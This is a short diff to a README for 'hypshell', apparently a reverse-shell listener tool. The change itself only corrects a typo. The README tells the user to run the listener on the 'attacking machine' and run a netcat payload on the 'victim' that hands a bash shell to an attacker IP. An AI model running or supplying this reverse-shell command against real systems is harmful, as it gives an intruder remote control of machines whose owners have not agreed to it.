Hyper100/hypshell/README.md

 # Usage
 `usage: ./hypshell.py [options] port`

-You can run the script on the attacking machine to listen for incmoing connections.
+You can run the script on the attacking machine to listen for incoming connections.

 Run this payload exmaple on the victim to start a reverse shell:
 `nc -c /bin/bash <port> <attacker_ip>`